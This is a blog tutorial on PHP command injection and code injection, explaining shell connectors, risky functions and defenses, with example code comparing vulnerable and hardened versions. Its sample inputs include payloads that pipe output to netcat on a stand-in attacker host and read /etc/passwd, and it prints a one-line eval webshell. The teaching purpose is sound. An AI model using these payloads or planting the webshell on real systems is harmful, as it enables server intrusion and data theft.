Command execution and code execution vulnerabilities

Table of Contents

1. Command execution vulnerability

 1. Common command execution functions in PHP

 2. Command execution vulnerability defense

2. Code execution vulnerabilities

 1. Vulnerability

 2. Code execution functions in PHP

 3. Code execution vulnerability defense


1. Command execution vulnerability

       Scripting languages such as PHP let programmers build applications quickly and concisely, but they also have drawbacks: they can be slow, and they cannot reach the lower layers of the system directly. So an application, especially an enterprise-level one, often needs to call external programs, and it does so through the language's system command functions. When the application calls such a function and user input is spliced into the command line as an argument of the system command without being filtered, the result is a command execution vulnerability.

       In other words, command execution invokes the operating system's own commands. The underlying principle is that the shell treats characters such as &, &&, |, || and ; as command connectors. The user submits input through the browser; because the server does not filter it before handing it to the execution function, the input is spliced into the command line as an argument of the system command, and any connector it contains lets the attacker append a command of their own.

command1&command2     Run both commands; command2 runs even if command1 fails (on Linux shells, & also puts command1 in the background)
command1&&command2    Run command2 only if command1 succeeds
command1;command2     Run command2 regardless of whether command1 succeeded (Linux)
command1|command2     Pipe: the standard output of command1 becomes the standard input of command2; command2 still runs when command1 fails
command1||command2    Run the commands in sequence and stop at the first one that succeeds, so command2 runs only if command1 fails

 1. Common command execution functions in PHP

  • system(): executes the string as an OS command and prints the output itself (no need to echo); it returns only the last line of output
  • exec(): executes the string as an OS command but prints nothing; it returns only the last line, and the full output is available only through its optional array argument, so the caller must output the result itself
  • shell_exec(): executes the command through the shell and returns the complete output as a string
  • passthru(): executes the string as an OS command and passes the raw output straight through to the browser (no need to echo), which makes it suitable for binary output
  • `` (backquote): same function as shell_exec()
  • popen(): opens a pipe to a process started from the command string; the related proc_open() does the same with separate stdin/stdout/stderr handles

Worked case of command execution: DVWA's Command Injection module.

 2. Command execution vulnerability defense

1. Minimize the use of command execution functions, and disable the ones you do not need through disable_functions in php.ini

2. Validate the parameters against an allowlist (for example a regular expression for an IP address or hostname) before they reach the function or method that executes the command

3. Wrap every parameter value in quotes whenever possible and escape it with escapeshellarg() before splicing; addslashes() only escapes quotes and backslashes and does nothing about &, |, ; or $(...), so it is not a shell escaper
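As an added illustration (not code from the original article or from DVWA), here is a DVWA-style "ping" helper written twice in PHP: first with the raw splice that produces the vulnerability, then with an allowlist check followed by escapeshellarg(). The script only builds the command strings and inspects the input, it never runs a command, so it can be executed offline to compare the two results. It assumes PHP 7.1 or later and the Linux form `ping -c`; the sample inputs and the hostname `attacker` are constructed for the demonstration.

```php
<?php
// Added example, not code from the original article or from DVWA.
// Builds the command a DVWA-style "ping" page would run, in two versions.

declare(strict_types=1);

// Vulnerable: user input is spliced straight into the command line, so every
// shell connector in the table above is honoured by the shell.
function buildPingVulnerable(string $ip): string
{
    return 'ping -c 3 ' . $ip;
}

// Hardened: allowlist the value first (IPv4 address or a plain hostname),
// then quote it with escapeshellarg() so that anything that slips through
// is handed to the command as literal text, not parsed by the shell.
function buildPingSafe(string $ip): ?string
{
    $isIpv4 = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
    $hostRe = '/^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
            . '(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/';
    $isHost = preg_match($hostRe, $ip) === 1;
    if (!$isIpv4 && !$isHost) {
        return null; // reject the value instead of trying to "clean" it
    }
    return 'ping -c 3 ' . escapeshellarg($ip);
}

// Constructed sample inputs: one benign value, then one payload per connector.
$inputs = [
    '127.0.0.1',
    '127.0.0.1; id',
    '127.0.0.1 && cat /etc/passwd',
    '127.0.0.1 | nc attacker 4444',
    'nosuchhost || id',
    '$(id)',
];

foreach ($inputs as $in) {
    printf("input:      %s\n", $in);
    printf("vulnerable: %s\n", buildPingVulnerable($in));
    printf("safe:       %s\n\n", buildPingSafe($in) ?? '(rejected by allowlist)');
}
```

Run it with `php ping_demo.php`. Every crafted value is rejected by the allowlist before escapeshellarg() is even reached; the escaping is the second layer, so that a value which passes a looser check still cannot terminate the argument.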

2. Code execution vulnerabilities 

       When an application calls a function that turns a string into code (such as eval() in PHP, which executes a string as PHP code) without considering whether the user controls that string, the result is a code execution vulnerability. Such vulnerabilities are hard to find by black-box testing; most are identified by reading the source code.

       Code execution (code injection) is analogous to SQL injection: SQLi injects SQL statements that the database executes, whereas code injection injects program code that the application hands to the server-side interpreter. If such a vulnerability is not specifically filtered, it is equivalent to a ready-made web backdoor.

1. Vulnerability

       Through a code execution vulnerability an attacker inherits the permissions of the web server user and can execute arbitrary code. If the server is misconfigured and that user has high privileges, the attacker can read and write any file on the target server and may end up controlling the whole website and server.

2. Code execution functions in PHP

  • eval(): executes the string as PHP code
  • assert(): a string argument is also evaluated as PHP code (deprecated in PHP 7.2, and no longer evaluated from PHP 8.0)
  • call_user_func(): calls the function named by its first argument; is_callable() tells you whether a value can be called
  • call_user_func_array(): same as call_user_func(), but the arguments are passed as an array
  • create_function(): creates an anonymous function from a string, internally through eval (deprecated in PHP 7.2, removed in 8.0)
  • preg_replace(): with the /e modifier the replacement string is executed as PHP code; the modifier only exists in PHP versions below 7
  • array_map(): applies a callback function to each element of the array
  • array_filter(): passes each value of the array to the callback in turn; if the callback returns true, that value is kept in the result array, with keys unchanged
  • usort(): sorts the array with a user-defined comparison function

The callback-taking functions in this list become code execution sinks as soon as the callback name comes from the user: array_map('system', ['id']) runs the id command.

In a word, the classic "one-line trojan" webshell is simply a deliberately planted code execution vulnerability:

<?php @eval($_POST[cmd]);?>

3. Code execution vulnerability defense

  • Make sure user input cannot reach the parameters of eval() at all; where dynamic behaviour is needed, check the input against a strict format with a regular expression or an allowlist of permitted values
  • If a string must still be embedded, wrap it in single quotes and run addslashes() on it before insertion; this only stops the value from breaking out of the quotes and is no substitute for keeping user data out of eval()
  • Give up the /e modifier of preg_replace() in favour of preg_replace_callback(), and make sure the matched text is wrapped in single quotes in the replacement (second parameter) rather than interpolated directly
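The following added example (not code from the original article) shows two of the code injection patterns from the function list above next to their fixes: a user-chosen callback name passed to array_map(), replaced by a dispatch table, and a preg_replace() /e template rewritten with preg_replace_callback(). It assumes PHP 7.1 or later; the operation names, the template syntax and the sample values are constructed for the demonstration.

```php
<?php
// Added example, not code from the original article.
// Two code injection patterns and the corresponding safe forms.

declare(strict_types=1);

// --- Pattern 1: user-chosen callback name ---------------------------------
// Vulnerable: the function name comes straight from the request, so
// ?func=system&arg=id would make array_map() run the id command.
function applyVulnerable(string $func, array $values): array
{
    return array_map($func, $values);
}

// Hardened: a dispatch table maps permitted names to real callables, so the
// user can only choose among what the application deliberately exposes.
function applySafe(string $func, array $values): array
{
    $allowed = [
        'upper' => 'strtoupper',
        'trim'  => 'trim',
        'len'   => 'strlen',
    ];
    if (!array_key_exists($func, $allowed)) {
        throw new InvalidArgumentException("unknown operation: $func");
    }
    return array_map($allowed[$func], $values);
}

// --- Pattern 2: preg_replace() with the /e modifier ------------------------
// Vulnerable (PHP 5 only, shown as a comment, not executed):
//   preg_replace('/\{(\w+)\}/e', '$vars["$1"]', $template);
// With /e the replacement string is PHP source and every capture is spliced
// into it, so whatever the pattern captures is run as code.
//
// Hardened: preg_replace_callback() receives the match as plain data and the
// replacement logic is real code written by the developer, never a string.
function renderTemplate(string $template, array $vars): string
{
    return preg_replace_callback(
        '/\{(\w+)\}/',
        function (array $m) use ($vars): string {
            return $vars[$m[1]] ?? '';
        },
        $template
    );
}

// Constructed inputs.
$values = [' Alice ', 'bob'];

print_r(applyVulnerable('trim', $values)); // works, but 'system' would be accepted too
print_r(applySafe('upper', $values));

try {
    applySafe('system', ['id']); // rejected: not in the dispatch table
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

echo renderTemplate(
    'Hello {name}, your role is {role}. {missing}',
    ['name' => 'Alice', 'role' => 'admin']
), "\n";
```

The dispatch table is the general form of the first defense bullet: the user selects a key, and the application, not the user, decides which code that key maps to. The same shape replaces create_function() and user-controlled arguments to usort(), array_filter() and call_user_func_array().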


Origin blog.csdn.net/qq_44159028/article/details/114642034